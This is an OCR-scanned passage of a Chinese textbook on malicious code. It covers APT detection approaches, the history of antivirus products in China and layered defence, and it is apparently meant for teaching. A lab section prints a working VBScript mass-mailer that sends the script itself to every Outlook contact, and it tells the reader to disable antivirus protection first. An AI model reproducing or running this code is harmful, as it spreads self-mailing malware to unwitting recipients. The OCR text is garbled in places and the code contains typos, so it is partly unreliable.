都 对 威胁 情报 的 概念 进行 过 曾 述 ,目前 接受 范围 较 广 的 是 Gartner 在 2014 年 发 表 的 (安全 
威胁 情报 服务 市 场 指南 》(Market Guide for Security Threat Intelligence Service) 中 提出 
的 定义 。 威 胁 情 报 是 关于 IT 或 信息 资产 所 面临 的 现 有 或 潜在 威胁 的 循 证 知识 ,包括 情境 、 
机 制 、 指 标 、 推 论 与 可 行 建 议 ,这 些 知 识 可 为 威胁 响应 提供 决策 依据 。 

针对 APT 防范 的 威胁 情报 包括 APT 操作 者 的 最 新 信息 ,从 恶意 软件 分 析 系 统 中 获取 
的 威胁 情报 ; 已 知 的 不 良 域名 、 电 子 邮 件 地 址 、 恶 意 电 子 邮件 附件 ,电子 邮件 主题 ; 恶意 链 
接 和 网 站 。 

除了 威胁 情报 分 析 系 统 能 够 用 于 防范 APT 攻击 之 外 ,还 有 比较 传统 的 方法 , 那 就 是 针 
对 APT 攻击 的 核心 步骤 展开 的 防范 。 

纵 观 整个 APT 攻击 过 程 ,可 以 发 现 APT 攻击 的 关键 步骤 包括 攻击 者 通过 恶意 代码 对 
员工 个 人 计算 机 进行 单 点 攻击 突破 、 攻 击 者 的 内 部 横向 渗透 .通过 构建 的 控制 通道 获取 攻击 
者 指令 ,以 及 最 后 的 敏感 数据 外 传 等 过 程 。 当 前 的 APT 攻击 检测 和 防御 方案 其 实 都 是 于 
绕 这 些 步 又 展开 的 ,它们 分 为 以 下 4 类 。 

1. 恶意 代码 检测 类 方案 

恶意 代码 检测 类 方案 主要 覆盖 APT 攻击 过 程 中 的 单 点 攻击 突破 阶段 , 它 检测 APT 攻 
击 过 程 中 的 恶意 代码 传播 过 程 。 大 多 数 APT 攻击 都 是 通过 恶意 代码 来 攻击 员工 个 人 计算 
机 ,从 而 来 突破 目标 网 络 和 系统 防御 措施 的 ,因此 ,恶意 代码 检测 对 于 检测 和 防御 APT 攻 
击 至 关 重 要 。 

2. 主机 应 用 保护 类 方案 
主机 应 用 保护 类 方案 主要 覆盖 APT 攻击 过 程 中 的 单 点 攻击 突破 和 数据 搜集 上 传 阶 
段 。 不管 攻击 者 通过 何 种 渠道 向 员工 个 人 计算 机 发 送 恶 意 代码 ,这 个 恶意 代码 必须 在 员工 
计算 机 上 执行 才能 控制 整个 设备 。 因 此 .如 果 能 够 加 强 系统 内 各 主机 节点 的 安全 措施 ,确保 
员工 个 人 计算 机 及 服务 器 的 安全 ,就 可 以 有 效 防御 APT 攻击 。 
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3. 网 络 入 侵 检 测 类 方案 

网 络 入 侵 检 测 类 方案 主要 覆盖 APT 攻击 过 程 中 的 控制 通道 构建 阶段 ,通过 在 网 络 边 
界 处 部 署 人 侵 检测 系统 来 检测 APT 攻击 的 命令 和 控制 通道 。 安 全 分 析 人 员 发 现 , 虽 然 
APT 攻击 所 使 用 的 恶意 代码 变种 多 且 升 级 频繁 ,但 恶意 代码 所 构建 的 命令 控制 通道 通信 模 
式 并 不 经 常 变化 ,因此 ,可 以 采用 传统 入 侵 检测 方法 来 检测 APT 的 命令 控制 通道 。 该 类 方 
案 成 功 的 关键 是 如 何 及 时 获取 到 各 APT 攻击 手法 的 命令 控制 通道 的 检测 特征 。 

4. 大 数据 分 析 检 测 类 方案 

大 数据 分 析 检 测 类 方案 并 不 重点 检测 APT 攻击 中 的 某 个 步骤 , 它 覆 盖 了 整个 APT 攻 
击 过 程 。 该 类 方案 是 一 种 网 络 取证 思路 , 它 全 面 采 集 各 网 络 设备 的 原始 流量 及 各 终端 和 服 
务 器 上 的 日 志 , 然 后 进行 集中 的 海量 数据 存储 和 深入 分 析 , 它 可 在 发 现 APT 攻击 的 一 点 蛛 
丝 马 迹 后 ,通过 全 面 分 析 这 些 海 量 数据 来 还 原 整 个 APT 攻击 场景 。 大 数据 分 析 检 测 方案 
因为 涉及 海量 数据 处 理 ,因此 需要 构建 大 数据 存储 和 分 析 平 台 ,比较 典型 的 大 数据 分 析 平 台 
有 Spark、Hadoop 等 。 


9.7 综合 实验 
综合 实验 十 : 邮件 型 恶意 代码 实验 


【实验 目的 】 

掌握 邮件 型 恶意 代码 的 基本 原理 。 

【实验 环境 】 

(1) Windows XP 操作 系统 。 

(2) Outlook 邮件 客户 端 。 

【实验 步 又】 

(1) 在 Outlook 中 设置 用 户 账号 。 

(2) 在 Outlook 地 址 筹 中 添加 联系 人 。 

(3) 在 实验 的 计算 机 上 的 C 根 目 录 下 创建 空 文件 test. vbs。 

(4) 关闭 反 病 毒 软件 的 实时 防护 功能 。 

(5) 把 实验 代码 录入 到 test. vbs 文件 中 。 

(6) 运行 脚本 文件 ,程序 启动 Outlook( 由 于 现在 的 Outlook 版 本 较 高 ,Outlook 会 提示 
是 否 允 许 操作 ,请 选择 允许 ) 发 送 邮 件 。 

【实验 注意 事项 】 

(1) 要 成 功 实 验 , 系 统 必须 安装 Outlook Applicaton 应 用 软件 。 

(2) 为 了 不 给 自己 的 地 址 短 联 系 人 传送 垃圾 邮件 ,可 以 先 将 地 址 筹 中 的 联系 人 导出 , 然 
后 输入 实验 用 邮件 地 址 。 实 验 结束 后 ,再 重新 导入 原来 地 址 短 中 的 联系 人 。 

(3) 程序 运行 后 ,打开 实验 用 邮箱 查看 实验 结果 。 一 般 而 言 , 由 于 现在 的 邮件 服务 器 都 
会 对 邮件 进行 扫描 ,因此 传送 了 恶意 代码 的 邮件 不 能 传送 到 邮箱 。 解 决 办 法 是 : 将 程序 中 
的 一 个 语句 ObjMail. Attachments. Add《"c:\test. vbs") 删 除 , 或 者 将 附件 c:\test. vbs 文 


第 9 章 其 他 恶意 代码 251 


件 内 


容 改 为 其 他 内 容 。 
【实验 源码 】 
//code begin 


Set objOA = Wscript.CreateObject("Outlook. Application") 
Set objMapi = objOA.GetNameSpace("MAPI") 

For i = 1 to objMapi. AddressLists.Count 

Set objAddList = objMapi. AddressLists(i) 

For j =1 To objAddList. AddressEntries. Count 

Set objMail = objOA.CreateItem(0) 

ObjMail. Recipients. Add(objAddList. AddressEntries(j)) 
ObjMail. Subject =“" 你 好 !" 

0bjMail. Body = "这 次 给 你 的 附件 是 我 的 实验 题 ! 如 果 收 到 附件 请 不 要 下 载 , 不 要 打开 ." 
ObjMail. Attachments. Add("c:\test. vbs") 

ObjMail. Sent 

Next 

Next 

Set objMapi = Nothing 

Set objOA = Nothing 


//code end 
9.8 习 题 
一 、 填空 题 
1. 僵尸 网 络 的 主要 特征 是 和 一 对 多 控制 。 
2. Rootkit 是 攻击 者 用 来 和 的 工具 。 
3. 到 本 书 出 版 为 止 ,最 难 防范 的 恶意 代码 及 攻击 行为 主要 包括 和 
两 种 。 
二 、 选 择 题 
1. 多 数 流氓 软件 具有 ( ) 特 征 。 
A. 强迫 安装 B. 无 法 印 载 
C. 干扰 使 用 D. 病毒 和 黑客 
2. APT 的 两 个 主要 特征 包括 ( a 
A. 强迫 安装 B. 高 级 先进 
C. 持续 性 D. 传播 速度 快 
三 、 思 考题 


1. 流氓 软件 是 近期 提出 的 新 概念 ,请 问 流氓 软件 和 传统 计算 机 病毒 的 区 别 是 什么 ? 
2. 僵尸 网 络 的 主要 类 型 有 哪些 ? 

3. 试探 讨 Rootkit 恶意 代码 的 原理 及 其 防范 方法 。 

四 、 实 操 题 

1. 学 习 并 实践 基于 邮件 漏洞 的 恶意 代码 。 

2. 掌握 并 实验 WebPage 中 的 恶意 代码 。 

3. 收集 能 够 预防 和 杀 除 恶意 代码 , 流 谍 软 件 的 工具 ,并 学 习 其 使 用 方法 。 


第 10 竟 恶意 代码 防范 技术 


由 熊猫 软件 公司 进行 的 一 项 调查 表明 ; 38% 的 被 调查 者 认为 他 们 不 需要 防 病 毒 保护 ， 
因为 他 们 并 不 经 常 上 网 ,只 是 有 时 利用 它 来 访问 可 靠 的 网 站 ,或 和 亲友 之 间 互 发 电子 邮件 。 
同样 ,英国 电信 的 一 次 调查 也 显示 了 这 一 观念 倾向 : 28% 的 英国 中 小 企业 认为 采用 防 病毒 
和 防火 墙 等 安全 措施 对 他 们 来 说 并 不 重要 。 

通过 前 面 的 学 习 , 读 者 已 经 知道 恶意 代码 非常 危险 ,计算 机 系统 一 旦 感染 了 恶意 代码 ， 
其 后 果 往 往 是 不 堪 设 想 的 。 恶 意 代码 是 十 分 狭 独 的 ,只 要 计算 机 连接 在 网 络 上 ,只 要 浏览 网 
页 或 收发 电子 邮件 ,恶意 代码 就 可 能 会 让 计算 机 用 户 防不胜防 。 因 此 ,恶意 代码 的 防范 是 非 
常 有 用 的 技术 。 本 章 把 恶意 代码 防范 分 为 6 个 层次 : 检测 、 清 除 、 预 防 、 免 疫 、 防 范 策略 、 备 
份 及 恢复 等 。 其 中 ,防范 策略 在 第 12 章 详细 介绍 。 

本 章 学 习 目 标 

(1) 掌握 恶意 代码 防范 的 层次 结构 。 

(2) 理解 恶意 代码 检测 知识 及 实验 。 

(3) 掌握 恶意 代码 清除 知识 。 

(4) 掌握 恶意 代码 预防 知识 。 

(5) 掌握 恶意 代码 免疫 思路 。 


10.1 恶意 代码 防范 技术 的 发 展 


在 恶意 代码 防范 的 初期 ,编写 反 恶 意 代 码 软 件 并 不 困难 。 在 20 世纪 80 年 代 末 和 90 年 
代 初 ,许多 技术 人 员 通 过 自己 编写 针对 特定 类 型 的 恶意 代码 防护 程序 ,来 防御 专 一 的 恶意 
代码 。 

Frederick Cohen 证 明 ,因为 无 法 创建 一 个 单独 的 程序 ,能 在 有 限 的 时 间 里 检测 出 所 有 
未 知 的 计算 机 病毒 ,同样 ,对 恶意 代码 这 个 问题 就 更 是 无 法 解决 的 了 。 但 是 ,尽管 有 很 多 缺 
点 , 反 恶 意 代码 程序 应 用 仍然 是 非常 广泛 的 。 

非常 不 幸 的 是 , 玻 忽 往 往 是 造成 恶意 代码 传播 的 最 大 隐患 之 一 。 在 计算 机 安全 中 ,社会 
工程 学 方面 的 因素 比 技术 方面 的 因素 显得 更 为 重要 。 计 算 机 维护 和 网 络 安全 配置 上 的 最 小 
芯 忽 ,未 及 时 清除 已 感染 的 恶意 代码 ,都 为 恶意 代码 的 扩散 打开 了 方便 之 门 。 

在 检测 和 清除 的 最 初 阶段 ,由 于 数量 少 , 因 此 恶意 代码 非常 容易 对 付 (1990 年 时 才 仅 仅 
不 到 100 个 普通 计算 机 病毒 )。 初 期 的 恶意 代码 容易 对 付 的 原因 之 一 是 扩散 速度 非常 缓慢 。 
引导 区 病毒 往往 要 经 过 一 年 或 者 更 长 的 时 间 才能 从 一 个 国家 传播 到 另外 一 个 国家 。 那 个 时 
候 的 恶意 代码 传播 只 能 靠 “ 软 盘 十 邮政 "的 形式 ,无 法 和 现在 的 互联 网 相 比较 。 

1989 年 ,苏联 的 Eugene Kaspersky 开始 研究 计算 机 病毒 现象 。1991 一 1997 年 ,他 在 俄 罗 
斯 大 型 计算 机 公司 KAMI 的 信息 技术 中 心 ,带领 一 批 助手 研发 出 了 AVP 反 病 毒 程序 ,AVP 的 
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种 


反 病 毒 引 擎 和 病毒 库 , 一 直 以 其 严谨 的 结构 、 彻 底 的 查 杀 能 力 为 业界 称道 。1997 年 , Eugene 
Kaspersky 作为 创始 人 之 一 成 立 了 Kaspersky Lab。2000 年 11 月 ,AVP 更 名 为 Kaspersky 
Anti-Virus。Eugene Kaspersky 也 是 计算 机 反 病 毒 研究 员 协 会 (CARO) 的 成 员 。 

在 中 国 , 王 江 民 是 我 国 最 早 的 计算 机 反 病毒 专家 之 一 ,也 是 江 民 杀毒 软件 创始 人 。 他 于 
1989 年 开始 从 事 微机 反 病毒 研 究 , 开 发 出 KV 系列 反 病 毒 软件 , 占 反 病 毒 市 场 80% ,正版 用 
户 接 近 100 万 。1996 年 ,KV300 一 江 民 科技 正式 成 立 , 取 得 了 单 月 销售 超过 千 万 元 的 历史 
最 好 纪录 ,成 功 实现 从 DOS 向 Windows 时 代 反 计算 机 病毒 的 转换 。 从 20 世纪 90 年 代 开 
始 至 今 ,我 国 反 恶 意 代码 软件 市 场 历经 一 统 天 下 .竞相 降价 、 媒 体 造 势 .诉讼 官司 等 各 种 市 场 
阶段 。 奇 虎 360 在 2008 年 率先 推出 了 免费 的 云 安 全 杀毒 软件 一 一 《360 杀毒 ), 直接 针对 之 
前 的 三 巨头 一 一 金山 、 瑞 星 、 江 民 , 从 而 开启 了 我 国 反 恶意 代码 的 免费 时 代 。 其 后 ,瑞星 \ 金 
山 也 相继 宣布 免费 。 金 山 毒 霸 甚至 推出 “ 敢 赔 服务 ”一 一 因 人 金山 毒霸 不 及 时 进行 拦截 而 导致 
用 户 遭 受 经 济 损失 的 ,金山 公司 会 提供 现金 赔偿 。 另 外 ,我 国 一 些 传统 互联 网 公司 ,如 腾讯 、 
百度 也 纷纷 介入 反 恶意 代码 软件 的 市 场 争 夺 战 中 ,推出 各 种 免费 服务 。 


10.2 中 国 恶意 代码 防范 技术 的 发 展 


从 1988 年 我 国 发 现 第 一 个 传统 计算 机 病毒 “小 球 ” 算 起 ,至今 中 国 计 算 机 反 恶 意 代码 之 
路 已 经 走 过 了 30 年 。 在 攻防 双方 经 历 了 长 期 的 争斗 后 ,恶意 代码 迄今 为 止 已 经 超过 了 100 
万 种 ,而 反 恶 意 代码 技术 也 已 经 更 新 了 一 代 又 一 代 。 

在 DOS、Windows 时 代 (1988 一 1998 年 ) ,主要 研究 防范 文件 型 和 引导 区 型 的 传统 病毒 
的 技术 。 接 下 来 的 10 年 是 互联 网 时 代 (1998 一 2008 年 ) ,主要 是 针对 蠕虫 .木马 的 防范 技术 
进行 研究 。2008 年 以 后 ,恶意 代码 更 加 复杂 ,多 数 新 恶意 代码 是 集 后 门 , 木 马 . 蠕 虫 等 特征 
于 一 体 的 混合 型 产物 。 新 时 代 的 恶意 代码 的 危害 方式 也 发 生 了 根本 转变 ,主要 集中 在 浪费 
资源 ,窃取 信息 等 。 下 面 分 时 代 描 述 中 国 恶意 代码 的 防范 之 路 。 

1. DOS 杀毒 时 代 

20 世纪 80 年 代 末 ,国内 先后 出 现 了 “小 球 ” 和 “大 麻 ” 等 传统 计算 机 病毒 ,而 当时 国内 并 
没有 杀毒 软件 ,一 些 程序 员 使 用 Debug 来 跟踪 并 清除 病毒 ,这 也 成 为 最 早 、 最 原始 的 手工 杀 
毒 技术 。Debug 通过 跟踪 程序 运行 过 程 ,寻找 病毒 的 突破 口 , 然 后 通过 Debug 强大 的 编译 
功能 将 其 清除 。 在 早期 的 反 病 毒 工作 中 ,Debug 发 挥 了 重大 作用 ,但 由 于 使 用 Debug 需要 
精通 汇编 语言 和 一 些 底层 技术 ,因此 能 够 熟练 使 用 Debug 杀 病 毒 的 人 并 不 多 。 早 期 经 常 使 
用 Debug 分 析 病 毒 的 程序 员 ,在 长 期 的 杀毒 工作 过 程 中 积累 了 丰富 经 验 及 病毒 样本 ,多 数 
成 为 后 来 计算 机 反 病 毒 行业 的 中 坚 技术 力量 。 

随 着 操作 系统 和 恶意 代码 技术 的 发 展 ,以 及 传统 病毒 逐渐 退出 历史 舞台 ,现在 的 研 
究 人 员 已 经 很 少 用 Debug 去 分 析 病 毒 ,而 是 普遍 应 用 了 IDA、OllyDbg、SoftICE 等 反 编译 
工具 。 
恶意 代码 的 增加 使 得 手工 跟踪 越 来 越 不 现实 ,便于 商业 化 的 防范 技术 便 应 运 而 生 。 其 
中 ,最 具 代 表 性 的 是 特征 码 扫 描 技术 。 特 征 码 扫描 技术 主要 由 特征 码 库 和 扫描 算法 构成 。 
而 特征 码 库 是 可 以 方便 升级 的 部 分 .因此 更 加 适合 商业 化 。 随 着 恶意 代码 攻击 技术 的 发 展 ， 
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反 恶 意 代 码 技术 也 逐步 进化 ,出 现 了 广 谱 杀 毒 技 术 、 宏 杀毒 技术 、 以 毒 攻 毒 法 、 内 存 监控 法 、 
虚拟 机 技术 、 启 发 式 分 析 法 、 指 纹 分 析 法 、 神 经 网 络 系统 等 。 

2. Windows 时 代 

随 着 Windows 95 和 Windows 98 操作 系统 的 逐渐 普及 ,计算 机 开始 进入 可 视 化 视窗 时 
代 , 计 算 机 与 外 界 数据 交换 越 来 越 频 繁 ,恶意 代码 开始 从 各 种 途径 人 侵 。 除 了 软盘 外 ,光盘 、 
硬盘 网络 共享 .邮件 、 网 络 下 载 .注册 表 等 都 可 能 成 为 病毒 感染 的 通道 。 病 毒 越 来 越 多 ,一 
味 地 杀毒 将 使 计算 机 用 户 疲 于 应 付 , 这 时 , 反 病 毒 工程 师 开 始 意识 到 有 效 防 御 病 毒 比 单纯 杀 
毒 对 于 用 户 来 讲价 值 更 大 。1999 年 ,中 国 的 江 民 公司 研发 成 功 病毒 实时 监控 技术 ,首次 突 
破 了 杀毒 软件 的 单一 杀毒 概念 ,开创 了 从 “杀毒 到 * 反 病毒 "新 时 代 。 从 此 ,杀毒 软件 也 开始 
摆脱 了 一 张 杀毒 盘 的 概念 。 安 装 版 的 杀毒 软件 与 操作 系统 同步 运行 ,对 通过 文件 .邮件 、 网 
页 等 途径 进入 计算 机 的 数据 进行 实时 过 滤 ,发 现 病毒 在 内 存 阶段 立即 清除 ,抵御 病毒 于 系统 
之 外 。 

随 着 这 一 技术 的 发 展 和 完善 ,目前 实时 监控 技术 已 经 非常 完善 ,典型 的 实时 监控 系统 具 
有 文件 监视 .邮件 监视 .网 页 监视 .即时 通信 监视 ,木马 注册 表 监 视 , 脚 本 监视 .隐私 信息 保护 
七 大 实时 监控 功能 。 从 入 侵 通 道 封杀 病毒 ,成 为 目前 杀毒 软件 最 主流 和 最 具有 价值 的 核心 
技术 。 

衡量 一 款 杀 毒 软件 的 查 杀 能 力 , 也 主要 测试 其 实时 监控 性 能 。 例 如 ,网 页 上 发 现 的 病 
毒 ,是 在 下 载 过 程 中 报警 并 清除 ,还 是 在 下 载 完 毕 后 才 报警 并 处 理 ? 经 过 层 层 压缩 和 加 密 的 
病毒 ,杀毒 软件 是 在 建 目 录 时 便 能 侦 测 到 并 报警 ,还 是 选择 了 这 个 病毒 压缩 包 后 才 报警 ? 病 
毒 实 时 监控 技术 又 包含 比特 动态 滤 毒 技术 深层 杀毒 技术 .神经 敏感 系统 技术 等 ,这 些 技术 
使 得 杀毒 软件 在 实时 监控 病毒 时 更 灵敏 ,清除 病毒 也 更 彻底 。 

3. 互联 网 时 代 

从 2003 年 以 来 ,伴随 着 互联 网 的 高 速 发 展 , 恶 意 代码 也 进入 了 愈加 狙 狂 和 泛滥 的 新 阶 
段 ,并 呈现 出 种 类 和 数量 迅速 增长 ,传播 手段 越 来 越 广泛 .技术 水 平 越 来 越 高 .危害 越 来 越 大 
等 特征 。 伴 随 着 恶意 代码 攻击 技术 的 飞速 发 展 , 一 些 新 的 恶意 代码 防范 技术 也 应 运 而 生 。 

1) 未 知 病毒 主动 防御 技术 

未 知 病毒 主动 防御 不 同 于 常规 的 特征 扫描 技术 ,其 核心 原理 是 依据 行为 进行 判断 。 主 
动 防御 监测 系统 主要 依靠 本 身 的 鉴别 系统 ,分 析 某 种 应 用 程序 运行 进程 的 行为 ,从 而 判断 它 
的 行为 ,达到 主动 防御 的 目的 。 

当前 的 杀毒 软件 都 是 通过 从 病毒 样本 中 提取 病毒 特征 值 来 构成 病毒 特征 库 的 ,采用 特 
征 扫描 技术 ,通过 与 计算 机 中 的 应 用 程序 或 者 文件 等 的 特征 值 逐 一 比 对 ,来 判断 计算 机 是 否 
已 经 被 病毒 感染 , 即 由 专业 反 病毒 人 员 在 反 病 毒 公司 对 可 疑 程序 进行 人 工分 析 和 研究 。 杀 
毒 软件 厂商 只 有 通过 用 户 上 报 或 者 通过 技术 人 员 在 网 络 上 搜索 才能 捕获 到 新 病毒 ,然后 从 
新 病毒 中 提取 病毒 特征 值 添加 到 病毒 库 中 ,用 户 通过 升级 获取 最 新 的 病毒 库 ,才能 判断 某 个 
程序 是 病毒 。 

如 果 用 户 不 升级 ,用 户 计 算 机 上 安装 的 杀毒 软件 就 不 能 防范 新 出 现 的 病毒 ,这 也 是 专业 
反 病 毒 工程 师 一 直 强 调用 户 要 及 时 升级 杀毒 软件 病毒 库 的 原因 。 这 种 特征 值 扫描 技术 的 原 
理 决定 了 杀毒 软件 的 滞后 性 ,使 用 户 不 能 对 网 络 新 病毒 及 时 防御 ,网 络 病毒 的 频频 爆发 已 经 
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使 国际 与 国内 反 病 毒 领域 开始 意识 到 ,亡羊补牢 式 的 防范 技术 越 来 越 被 动 ,所 以 主动 防御 监 
测 技 术 应 运 而 生 。 

2) 系统 启动 前 杀毒 技术 

近年 来 ,一 系列 计算 机 新 技术 被 恶意 代码 利用 ,人 们 发 现 ,恶意 代码 开始 越 来 越 难 清除 
了 ,中 了 毒 无 法 查 出 , 查 出 病毒 又 无 法 清除 ,其 至 杀毒 软件 反 被 感染 的 事情 也 时 有 发 生 。 
Rootkit、 择 入 线程 .插入 进程 等 计算 机 技术 已 经 成 为 木马 的 常用 办 法 。BOOTSCAN 系统 
启动 前 防范 技术 正 是 针对 这 类 疑难 恶意 代码 。 此 项 技术 在 系统 启动 之 前 就 调用 杀毒 引擎 扫 
描 和 清除 病毒 ,因为 在 这 一 阶段 病毒 的 一 些 自 我 保护 和 对 抗 反 病 毒 技术 的 功能 还 没有 运行 ， 
比较 容易 被 清除 。 

3) 反 Rootkit Hook 技术 

越 来 越 多 的 恶意 代码 开始 利用 Rootkit 技术 隐藏 自身 ,利用 Hook 技术 破坏 系统 文件 ， 
防止 被 安全 软件 所 查 杀 。 反 病毒 Rootkit、 反 病毒 Hook 技术 能 够 检测 出 深 藏 的 病毒 文件 、 
进程 .注册 表 键 值 ,并 能 够 阻止 病毒 利用 Hook 技术 破坏 系统 文件 ,接管 病毒 Hook ,防御 恶 
意 代 码 于 系统 之 外 。 

4) 虚拟 机 脱 壳 

虚拟 机 的 原理 是 在 系统 上 虚拟 一 个 操作 环境 ,让 病毒 运行 在 这 个 虚拟 环境 之 下 ,在 病毒 
现 出 原形 后 将 其 清除 。 虚 拟 机 目前 主要 应 用 在 脱 壳 方面 ,许多 未 知 病毒 其 实 是 换 汤 不 换 药 
的 ,只 是 在 原 病 毒 基础 上 加 了 一 个 壳 ,如果 能 成 功 地 把 病毒 的 这 层 壳 脱 掉 , 就 很 容易 将 病毒 
清除 了 。 

5) 内 核 级 主动 防御 

自 2008 年 以 来 ,大 部 分 主流 恶意 代码 都 进入 了 驱动 级 ,开始 与 安全 工具 争 抢 系统 驱动 
的 控制 权 , 在 取得 系统 驱动 控制 权 后 ,继而 控制 更 多 的 系统 权限 。 

内 核 级 主动 防御 技术 能 够 在 CPU 内 核 阶 段 对 恶意 代码 进行 拦截 和 清除 。 内 核 级 主动 
防御 系统 将 查 杀 模 块 直接 移植 到 系统 核心 层 直接 监控 恶意 代码 ,让 工作 在 系统 核心 态 的 驱 
动 程序 去 拦截 所 有 的 文件 访问 ,是 计算 机 信息 安全 领域 技术 发 展 的 新 方向 。 

在 网 络 空 间 攻 防 形势 迅速 发 展 的 今天 ,杀毒 软件 需要 对 付 的 已 不 仅仅 是 最 早 的 病毒 , 即 
那些 具有 感染 性 的 少数 恶意 代码 ,而 是 需要 对 付 包 括 蠕虫 .木马 \ 有 害 工 具 等 在 内 的 各 种 恶 
意 代码 。 为 完成 这 一 复杂 且 艰 巨 的 任务 .必须 掌握 * 反 病毒 引擎 ”核心 技术 。 反 病毒 引擎 技 
术 难 度 较 大 ,需要 长 期 技术 积累 ,我 国 研发 反 病 毒 引 擎 技术 起 步 并 不 算 晚 ,但 距离 国际 知名 
厂商 的 水 平一 直 有 一 定 差距 ,一 些 网 络 安全 产品 中 不 得 不 采用 外 国 的 引擎 ,这 显然 存在 着 安 
全 隐患 。 近 年 来 ,我 国 厂商 通过 自主 创新 、 大 力 研发 ,在 这 一 核心 技术 领域 进步 显著 ,并 取得 
了 令 人 瞩目 的 成 绩 。 

2013 年 ,中 国 厂商 安 天 的 Antiy AVL 被 国际 顶级 反 病 毒 评 测 机 构 AV-TEST 评 为 年 
度 最 佳 产品 ,这 也 是 亚洲 厂商 首次 获得 此 奖 , 此 前 ,AV-TEST 的 奖项 全 部 为 欧美 厂商 所 包 
揽 。2014 年 ,360 AntiVirus 和 猎豹 移动 Clean Master 获得 AV-TEST 年 度 最 佳 Android 
安全 产品 奖 。 在 著名 安全 软件 测试 机 构 AV-Comparatives( 简 称 AV-C) 2017 年 的 软件 评 
测 中 ,腾讯 4 次 获得 Advanced 十 的 评级 。 
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10.3 恶意 代码 防范 思路 


从 恶意 代码 防范 的 历史 和 未 来 趋势 来 看 ,要 想 成 功 防范 越 来 越 多 的 恶意 代码 ,使 用 户 免 
受 恶 意 代 码 侵扰 ,需要 从 以 下 6 个 层次 开展 : 检测 `. 清 除 预防 免疫、 数据 备份 及 恢复 、 防 范 
策略 。 

恶意 代码 的 检测 技术 是 指 通 过 一 定 的 技术 手段 判定 恶意 代码 的 一 种 技术 。 这 也 是 传统 
计算 机 病毒 木马、 蠕虫 等 恶意 代码 检测 技术 中 最 常用 .最 有 效 的 技术 之 一 。 其 典型 的 代表 
方法 是 特征 码 扫描 法 。 

恶意 代码 的 清除 技术 是 恶意 代码 检测 技术 发 展 的 必然 结果 ,是 恶意 代码 传染 过 程 的 一 
种 逆 过 程 。 也 就 是 说 ,只 有 详细 掌握 了 恶意 代码 感染 过 程 的 每 一 个 细节 ,才能 确定 清除 该 恶 
意 代码 的 方法 。 值 得 注意 的 是 , 随 着 恶意 代码 技术 的 发 展 ,并 不 是 每 个 恶意 代码 都 能 够 被 详 
细 分 析 , 因 此 ,也 并 不 是 所 有 恶意 代码 都 能 够 成 功 清除 。 正 是 基于 这 个 原因 ,数据 备份 和 恢 
复 才 显得 尤为 重要 。 

恶意 代码 的 预防 技术 是 指 通 过 一 定 的 技术 手段 防止 恶意 代码 对 系统 进行 传染 和 破坏 ， 
实际 上 它 是 一 种 预先 的 特征 判定 技术 。 具 体 来 说 ,恶意 代码 的 预防 是 通过 阻止 计算 机 恶意 
代码 进入 系统 或 阻止 恶意 代码 对 磁盘 的 操作 尤其 是 写 操作 ,以 达到 保护 系统 的 目的 。 恶 意 
代码 的 预防 技术 主要 包括 磁盘 引导 区 保护 、 加 密 可 执行 程序 、 读 写 控制 技术 和 系统 监控 技 
术 、 系 统 加 固 ( 如 打 补丁 ) 等 。 在 蠕虫 泛滥 的 今天 ,系统 加 固 方法 的 地 位 越 来 越 重要 ,处 于 不 
可 替代 的 地 位 。 

恶意 代码 的 免疫 技术 出 现 非常 早 , 但 是 没有 很 大 发 展 。 针 对 某 一 种 恶意 代码 的 免疫 方 
法 已 经 没有 人 再 用 了 ,而 目前 尚 没 有 出 现 通 用 的 能 对 各 种 恶意 代码 都 有 免疫 作用 的 技术 ,从 
某 种 程度 上 来 说 ,也 许 根 本 就 不 存在 这 样 的 技术 。 根 据 免疫 的 性 质 , 可 以 把 它 归 为 预防 技 
术 。 从 本 质 上 讲 , 对 计算 机 系统 而 言 ,计算机 预防 技术 是 被 动 预防 技术 ,通过 外 围 的 技术 增 
加 计算 机 系统 的 防范 能 力 ; 而 计算 机 免疫 技术 是 主动 的 预防 技术 ,通过 计算 机 系统 本 身 的 
技术 增加 自己 的 防范 能 力 。 

数据 备份 及 数据 恢复 是 在 清除 技术 无 法 满足 需要 的 情况 下 而 不 得 不 采用 的 一 种 防范 技 
术 。 随 着 恶意 代码 的 攻击 技术 越 来 越 复杂 ,以 及 恶意 代码 数量 的 爆炸 性 增长 ,清除 技术 过 到 
了 发 展 瓶颈 。 数 据 备份 及 数据 恢复 的 思路 是 : 在 检测 出 某 个 文件 被 感染 了 恶意 代码 后 ,不 
去 试图 清除 其 中 的 恶意 代码 使 其 恢复 正常 ,而 是 直接 用 事先 备份 的 正常 文件 覆盖 被 感染 后 
的 文件 。 数 据 备份 及 数据 恢复 中 的 数据 的 含义 是 多 方面 的 , 既 指 用 户 的 数据 文件 ,也 指 系统 
程序 .关键 数据 (注册 表 ) ,常用 应 用 程序 等 “三 分 技术 .七 分 管理 .十 二 分 数据 ”的 说 法 成 为 
现代 企业 信息 化 管理 的 标志 性 注释 。 这 充分 说 明 ,信息 、 知 识 等 数据 资源 已 经 成 为 继 土 地 和 
资本 之 后 最 重要 的 财富 来 源 。 

恶意 代码 的 防范 策略 是 管理 手段 ,而 不 是 技术 手段 。ISO 17799 是 关于 信息 安全 管理 
体系 的 详细 标准 , 它 表 达 了 一 个 思想 , 即 信息 安全 是 一 个 复杂 的 系统 工程 。 在 这 个 系统 工程 
中 ,不 能 仅仅 依靠 技术 或 管理 的 任何 一 方 。“ 三 分 技术 ,七 分 管理 "已 经 成 为 信息 安全 领域 的 
共识 。 在 恶意 代码 防范 领域 ,防范 策略 同样 重要 。 一 套 好 的 管理 制度 和 策略 应 该 以 单位 实 
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际 情况 为 主要 依据 .能 及 时 反映 单位 实际 情况 变化 ,具有 良好 的 可 操作 性 ,由 科学 的 管理 条 
款 组 成 。 


10.4 ”恶意 代码 的 检测 


恶意 代码 检测 的 重要 性 就 如 同 医 生 对 病人 所 患 疾病 的 诊断 。 对 于 病人 ,只 有 确诊 以 后 ， 
医生 才能 对 症 下 药 。 对 于 恶意 代码 ,同样 也 必须 先 确定 恶意 代码 的 种 类 ,症状 ,才能 准确 地 
清除 它 。 如 果 盲 目地 乱 清 除 ,可 能 会 破坏 本 来 就 正常 的 应 用 程序 。 


10.4.1 恶意 代码 的 检测 技术 


恶意 代码 的 检测 技术 按 是 否 执行 代码 可 分 为 静态 检测 和 动态 检测 两 种 。 

静态 检测 是 指 在 不 实际 运行 目标 程序 的 情况 下 进行 检测 。 一 般 通 过 二 进 制 统计 分 析 、 
